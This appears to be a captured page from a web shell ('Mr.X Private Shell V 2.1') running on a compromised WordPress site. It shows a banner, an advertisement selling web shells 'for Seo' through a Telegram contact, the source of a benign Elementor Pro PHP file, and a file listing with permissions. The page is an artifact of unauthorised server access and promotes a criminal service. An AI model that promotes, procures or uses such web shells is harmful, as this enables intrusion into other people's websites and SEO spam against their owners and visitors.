__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace ElementorPro\Modules\LoopBuilder\Skins;
use ElementorPro\Modules\LoopBuilder\Module;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly
}
class Skin_Loop_Post extends Skin_Loop_Base {
public function get_id() {
return Module::LOOP_POST_SKIN_ID;
}
public function get_title() {
return esc_html__( 'Posts', 'elementor-pro' );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| skin-loop-base.php | File | 7.08 KB | 0664 |
|
| skin-loop-post-taxonomy.php | File | 880 B | 0664 |
|
| skin-loop-post.php | File | 374 B | 0664 |
|
| skin-loop-taxonomy-base.php | File | 6.54 KB | 0664 |
|